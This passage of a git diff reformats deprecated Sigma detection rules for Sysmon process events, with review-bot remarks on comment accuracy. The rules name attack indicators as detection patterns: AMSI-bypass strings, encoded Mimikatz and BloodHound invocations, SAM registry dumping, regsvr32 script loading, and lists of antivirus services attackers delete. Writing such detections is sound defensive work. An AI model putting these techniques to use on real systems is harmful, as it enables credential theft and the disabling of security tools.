\wbem\WMIC.exe + - CommandLine|contains: 'wmic ' selection2: ParentImage|endswith: - \winword.exe diff --git a/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml b/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml index b41625abc..c4ed6b6c0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_possible_applocker_bypass.yml 
@@ -1,8 +1,7 @@ title: Possible Applocker Bypass id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 status: deprecated -description: Detects execution of executables that can be used to bypass Applocker - whitelisting +description: Detects execution of executables that can be used to bypass Applocker whitelisting references: - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ @@ -16,7 +15,7 @@ tags: - attack.t1218.009 - attack.t1127.001 - attack.t1218.005 - - attack.t1218 + - attack.t1218 # no way to map 1:1, so the technique level is required - sysmon logsource: category: process_creation @@ -26,18 +25,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - \msdt.exe - \installutil.exe - \regsvcs.exe - \regasm.exe + #- '\regsvr32.exe' # too many FPs, very noisy - \msbuild.exe - \ieexec.exe + #- '\mshta.exe' + #- '\csc.exe' condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment - - Using installutil to add features for .NET applications (primarily would occur - in developer environments) + - False positives depend on scripts and administrative tools used in the monitored environment + - Using installutil to add features for .NET applications (primarily would occur in developer environments) level: low ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml index 3679f356b..01d07cc65 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml 
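Review bot: The newly commented-out `#- '\mshta.exe'` and `#- '\csc.exe'` entries in `selection` give no reason for their exclusion, while the neighbouring regsvr32 entry documents its own (`# too many FPs, very noisy`). A maintainer tuning this list later cannot tell whether those two were dropped for noise, for coverage elsewhere, or by oversight; recording it inline, e.g. `#- '\mshta.exe' # excluded: <reason>`, keeps the list self-explaining. If this file is regenerated from the upstream Sigma rule, as the commit title suggests, the wording belongs there rather than here.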
@@ -1,8 +1,7 @@ title: PowerShell AMSI Bypass Pattern id: 4f927692-68b5-4267-871b-073c45f4f6fe status: deprecated -description: Detects attempts to disable AMSI in the command line. It is possible - to bypass AMSI by disabling it before loading the main payload. +description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. author: '@Kostastsale' references: - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ @@ -25,7 +24,7 @@ detection: - \powershell.exe - \pwsh.exe - \powershell_ise.exe - CommandLine|contains|all: + CommandLine|contains|all: - '[Ref].Assembly.GetType' - SetValue($null,$true) - NonPublic,Static diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml index 751122cc3..44dbf63e7 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml @@ -1,11 +1,10 @@ title: Malicious Base64 Encoded Powershell Invoke Cmdlets id: fd6e2919-3936-40c9-99db-0aa922c356f7 related: - - id: 6385697e-9f1b-40bd-8817-f4a91f40508e - type: similar + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar status: deprecated -description: Detects base64 encoded powershell cmdlet invocation of known suspicious - cmdlets +description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ author: pH-T (Nextron Systems) 
@@ -25,13 +24,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # Invoke-BloodHound - SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA - kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA - JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA + # Invoke-Mimikatz - SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA - kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A - JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg + # Invoke-WMIExec - SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA - kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw - JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml index fa3608c2e..4a5a2f6d0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml @@ -21,7 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Win32_Shadowcopy | ForEach-Object + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml index 7e429c504..3478733a4 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_base64_shellcode.yml 
@@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - OiCAAAAYInlM - OiJAAAAYInlM condition: process_creation and selection diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml index df6f31093..0b0259169 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_bitsjob.yml @@ -24,7 +24,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: Start-BitsTransfer + CommandLine|contains: Start-BitsTransfer condition: process_creation and selection fields: - ComputerName diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml index 3471567b0..a327858ab 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_service_modification.yml @@ -1,13 +1,9 @@ title: Stop Or Remove Antivirus Service id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b status: deprecated -description: 'Detects usage of ''Stop-Service'' or ''Remove-Service'' powershell cmdlet - to disable AV services. - - Adversaries may disable security tools to avoid possible detection of their tools - and activities by stopping antivirus service - - ' +description: | + Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. + Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ 
@@ -26,11 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_action: - CommandLine|contains: + CommandLine|contains: - 'Stop-Service ' - 'Remove-Service ' selection_product: - CommandLine|contains: + CommandLine|contains: + # Feel free to add more service name - ' McAfeeDLPAgentService' - ' Trend Micro Deep Security Manager' - ' TMBMServer' diff --git a/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml b/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml index 4bfea34ce..1af3a4c7e 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_powershell_xor_encoded_command.yml @@ -1,12 +1,10 @@ title: Potential Xor Encoded PowerShell Command id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 related: - - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f - type: similar + - id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f + type: similar status: deprecated -description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. - This pattern is often found in encoded powershell code and commands as a way to - avoid detection +description: Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton 
@@ -26,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.exe - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.exe + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ForEach - Xor condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml b/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml index 88b57caf8..b2fda5fa9 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_reg_dump_sam.yml @@ -1,12 +1,10 @@ title: Registry Dump of SAM Creds and Secrets id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e related: - - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 - type: similar + - id: fd877b94-9bb5-4191-bb25-d79cbd93c167 + type: similar status: deprecated -description: Adversaries may attempt to extract credential material from the Security - Account Manager (SAM) database either through Windows Registry where the SAM database - is stored +description: Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets author: frack113 @@ -24,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg: - CommandLine|contains: ' save ' + CommandLine|contains: ' save ' selection_key: - CommandLine|contains: + CommandLine|contains: - HKLM\sam - HKLM\system - HKLM\security 
diff --git a/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml b/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml index 68ba74dd9..3c892f254 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_regsvr32_anomalies.yml @@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection1: Image|endswith: \regsvr32.exe - CommandLine|contains: \Temp\ + CommandLine|contains: \Temp\ selection2: Image|endswith: \regsvr32.exe ParentImage|endswith: @@ -35,16 +35,16 @@ detection: ParentImage|endswith: \cmd.exe selection4a: Image|endswith: \regsvr32.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - http - CommandLine|endswith: scrobj.dll + CommandLine|endswith: scrobj.dll selection4b: Image|endswith: \regsvr32.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/i:' - ftp - CommandLine|endswith: scrobj.dll + CommandLine|endswith: scrobj.dll selection5: Image|endswith: - \cscript.exe @@ -52,18 +52,18 @@ detection: ParentImage|endswith: \regsvr32.exe selection6: Image|endswith: \EXCEL.EXE - CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' + CommandLine|contains: '..\..\..\Windows\System32\regsvr32.exe ' selection7: ParentImage|endswith: \mshta.exe Image|endswith: \regsvr32.exe selection8: Image|endswith: \regsvr32.exe - CommandLine|contains: + CommandLine|contains: - \AppData\Local - C:\Users\Public - selection9: + selection9: # suspicious extensions https://twitter.com/Max_Mal_/status/1542461200797163522/photo/3 Image|endswith: \regsvr32.exe - CommandLine|endswith: + CommandLine|endswith: - .jpg - .jpeg - .png 
@@ -73,14 +73,14 @@ detection: - .temp - .txt filter1: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Microsoft\Teams - \AppData\Local\WebEx\WebEx64\Meetings\atucfobj.dll filter2: ParentImage: C:\Program Files\Box\Box\FS\streem.exe - CommandLine|contains: \Program Files\Box\Box\Temp\ + CommandLine|contains: \Program Files\Box\Box\Temp\ filter_legitimate: - CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll + CommandLine|endswith: /s C:\Windows\System32\RpcProxy\RpcProxy.dll condition: process_creation and (1 of selection* and not 1 of filter*) fields: - CommandLine diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml index b90662aee..eadbdf89f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,7 @@ title: Renamed PaExec Execution id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b status: deprecated -description: Detects execution of renamed paexec via imphash and executable product - string +description: Detects execution of renamed paexec via imphash and executable product string references: - sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf 
@@ -25,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: Image|contains: paexec condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml index 1481304f7..2f21f4598 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_powershell.yml @@ -1,8 +1,7 @@ title: Renamed PowerShell id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 status: deprecated -description: Detects the execution of a renamed PowerShell often used by attackers - or malware +description: Detects the execution of a renamed PowerShell often used by attackers or malware references: - https://twitter.com/christophetd/status/1164506034720952320 author: Florian Roth (Nextron Systems), frack113 diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml index 886979f62..d333de9d7 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml 
+++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_psexec.yml @@ -1,8 +1,7 @@ title: Renamed PsExec id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 status: deprecated -description: Detects the execution of a renamed PsExec often used by attackers or - malware +description: Detects the execution of a renamed PsExec often used by attackers or malware references: - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml b/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml index 3d019b7a8..7fcb10a94 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_renamed_rundll32.yml @@ -1,8 +1,7 @@ title: Renamed Rundll32.exe Execution id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 status: deprecated -description: Detects the execution of rundll32.exe that has been renamed to a different - name to avoid detection +description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection references: - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml b/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml index b7dd7eb85..ac8d105b5 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_root_certificate_installed.yml 
@@ -1,11 +1,10 @@ title: Root Certificate Installed id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived status: deprecated -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st @@ -23,18 +22,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - Image|endswith: \certutil.exe - CommandLine|contains|all: + Image|endswith: \certutil.exe # Example: certutil -addstore -f -user ROOT CertificateFileName.der + CommandLine|contains|all: - -addstore - root selection2: - Image|endswith: \CertMgr.exe - CommandLine|contains|all: + Image|endswith: \CertMgr.exe # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all + CommandLine|contains|all: - /add - root condition: process_creation and (selection1 or selection2) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml b/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml index 9827ff64b..b19bf5212 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_run_from_zip.yml 
@@ -1,8 +1,7 @@
 title: Run from a Zip File id: 1a70042a-6622-4a2b-8958-267625349abf status: deprecated -description: Payloads may be compressed, archived, or encrypted in order to avoid - detection +description: Payloads may be compressed, archived, or encrypted in order to avoid detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file author: frack113
diff --git a/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml b/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml
index 938ead1c9..9099706ed 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_sc_delete_av_services.yml
@@ -1,8 +1,7 @@
 title: Suspicious Execution of Sc to Delete AV Services id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b status: deprecated -description: Detects when attackers use "sc.exe" to delete AV services from the system - in order to avoid detection +description: Detects when attackers use "sc.exe" to delete AV services from the system in order to avoid detection references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems)
@@ -21,18 +20,21 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: ' delete ' + CommandLine|contains: ' delete ' selection_av_process: - CommandLine|contains: + CommandLine|contains: + # Delete Service 'AVG' - AvgAdminServer - AVG Antivirus - MBEndpointAgent + # Delete Service 'Malwarebytes' - MBAMService - MBCloudEA - avgAdminClient + # Delete Service 'Sophos' - SAVService - SAVAdminService - Sophos AutoUpdate Service
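Review bot: The vendor comments added to the selection_av_process list do not line up with the entries beneath them: `MBEndpointAgent` is listed under `# Delete Service 'AVG'` while `avgAdminClient` is listed under `# Delete Service 'Malwarebytes'`. Because `CommandLine|contains` with a list is an OR over substrings, detection is unaffected, but anyone tuning or excluding entries per product will be misled by the grouping. Either move `MBEndpointAgent` below the Malwarebytes comment and `avgAdminClient` below the AVG comment, or drop the two comments. The same per-vendor comments continue in the later hunks of this file and the selection_av_process list runs past the end of this hunk, so the remaining groups should be checked for the same mismatch.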
@@ -55,11 +57,15 @@ detection:
 - Sophos Endpoint Defense Service - SophosFIM - swi_filter + # Delete Service 'FireBird' - FirebirdGuardianDefaultInstance - FirebirdServerDefaultInstance + # Delete Service 'Webroot' - WRSVC + # Delete Service 'ESET' - ekrn - ekrnEpsw + # Delete Service 'Kaspersky' - klim6 - AVP18.0.0 - KLIF
@@ -72,6 +78,7 @@ detection:
 - klhk - KSDE1.0.0 - kltap + # Delete Service 'Quick Heal' - ScSecSvc - Core Mail Protection - Core Scanning Server
@@ -80,11 +87,13 @@ detection:
 - RepairService - Core Browsing Protection - Quick Update Service + # Delete Service 'McAfee' - McAfeeFramework - macmnsvc - masvc - mfemms - mfevtp + # Delete Service 'Trend Micro' - TmFilter - TMLWCSService - tmusa
@@ -99,6 +108,7 @@ detection:
 - ofcservice - TmPfw - PccNTUpd + # Delete Service 'Panda' - PandaAetherAgent - PSUAService - NanoServiceMain
@@ -109,7 +119,6 @@ detection:
 - EPUpdateService condition: process_creation and (all of selection*) falsepositives: - - Legitimate software deleting using the same method of deletion (Add it to a - filter if you find cases as such) + - Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such) level: high ruletype: Sigma
diff --git a/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml b/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml
index b1c1f8e02..253b14075 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_schtasks_user_temp.yml
@@ -21,11 +21,11 @@ detection:
 schtasks: Image|endswith: \schtasks.exe option: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create ' - \AppData\Local\Temp filter_klite_codec: - CommandLine|contains|all: + CommandLine|contains|all: - '/Create /TN "klcp_update" /XML ' - \klcp_update_task.xml condition: process_creation and (schtasks and option and not 1 of filter_*)
diff --git a/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml b/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml
index 80b585abb..1a0cec354 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_service_stop.yml
@@ -17,30 +17,29 @@ detection:
 EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc_net_img: - - OriginalFileName: - - sc.exe - - net.exe - - net1.exe - - Image|endswith: - - \sc.exe - - \net.exe - - \net1.exe + - OriginalFileName: + - sc.exe + - net.exe + - net1.exe + - Image|endswith: + - \sc.exe + - \net.exe + - \net1.exe selection_sc_net_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' selection_pwsh: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: 'Stop-Service ' + CommandLine|contains: 'Stop-Service ' filter: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - User|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + User|contains: # covers many language settings - AUTHORI - AUTORI - condition: process_creation and ((all of selection_sc_net* and not filter) or - selection_pwsh) + condition: process_creation and ((all of selection_sc_net* and not filter) or selection_pwsh) fields: - ComputerName - User
diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml
index 1d9e88af4..ea34a2377 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_susp_bitstransfer.yml
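Review bot: The new comment on the first `filter` entry states that the legitimate Kaspersky command line has a double space between `sc` and `stop`, but the rendered hunk has collapsed whitespace, so whether the value `sc stop KSCWebConsoleMessageQueue` actually carries that double space cannot be confirmed here. This matters because `CommandLine:` without a modifier is an exact match: if the stored value has a single space it will never filter the event the comment describes, and if it has two spaces the comment is the only hint that the odd spacing is deliberate. Please verify the byte content of that line in the file, and consider making the intent unambiguous in the comment, e.g. `# KSC Web Console: the command line contains two spaces between "sc" and "stop" - keep them`.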
@@ -1,8 +1,7 @@
 title: Suspicious Bitstransfer via PowerShell id: cd5c8085-4070-4e22-908d-a5b3342deb74 status: deprecated -description: Detects transferring files from system on a server bitstransfer Powershell - cmdlets +description: Detects transferring files from system on a server bitstransfer Powershell cmdlets references: - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps author: Austin Songer @austinsonger
@@ -25,7 +24,7 @@ detection:
 - \powershell.exe - \powershell_ise.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - Get-BitsTransfer - Add-BitsFile condition: process_creation and selection
diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml
index 76bdb4e05..db1ee4482 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_susp_cmd_exectution_via_wmi.yml
@@ -1,8 +1,7 @@
 title: Suspicious Cmd Execution via WMI id: e31f89f7-36fb-4697-8ab6-48823708353b status: deprecated -description: Detects suspicious command execution (cmd) via Windows Management Instrumentation - (WMI) on a remote host. This could be indicative of adversary lateral movement. +description: Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement. references: - https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html author: Tim Rauch
@@ -22,9 +21,9 @@ detection:
 selection: Image|endswith: \cmd.exe ParentImage|endswith: \WmiPrvSE.exe - CommandLine|contains: \\\\127.0.0.1\\ + CommandLine|contains: \\\\127.0.0.1\\ selection_opt: - CommandLine|contains: + CommandLine|contains: - 2>&1 - 1> condition: process_creation and (all of selection*)
diff --git a/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml b/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml
index d8619ef14..6b21238d5 100644
--- a/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml
+++ b/sigma/sysmon/deprecated/proc_creation_win_susp_commandline_chars.yml
@@ -1,8 +1,7 @@
 title: Suspicious Characters in CommandLine id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 status: deprecated -description: Detects suspicious Unicode characters in the command line, which could - be a sign of obfuscation or defense evasion +description: Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation author: Florian Roth (Nextron Systems)
@@ -19,18 +18,18 @@ detection:
